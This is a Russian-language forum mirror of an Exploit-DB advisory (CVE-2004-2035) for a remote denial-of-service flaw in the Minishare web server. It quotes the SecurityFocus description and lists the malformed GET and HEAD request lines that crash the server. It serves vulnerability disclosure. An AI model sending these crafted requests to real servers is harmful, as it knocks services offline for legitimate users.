- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 24144
- Проверка EDB
-
- Пройдено
- Автор
- DONATO FERRANTE
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2004-2035
- Дата публикации
- 2004-05-26
Код:
source: https://www.securityfocus.com/bid/10417/info
Minishare is affected by a remote denial of service vulnerability. This issue is due to a failure of the application to handle improperly formed HTTP requests.
This issue will allow an attacker to cause the affected computer to stop responding, denying service to legitimate users.
GET:
1. GET /something HTTP/1.1
-
2. GET /something HTTP/1.1\n
-
HEAD:
1. HEAD /something HTTP/1.1
-
2. HEAD /something HTTP/1.1\n
-
- Источник
- www.exploit-db.com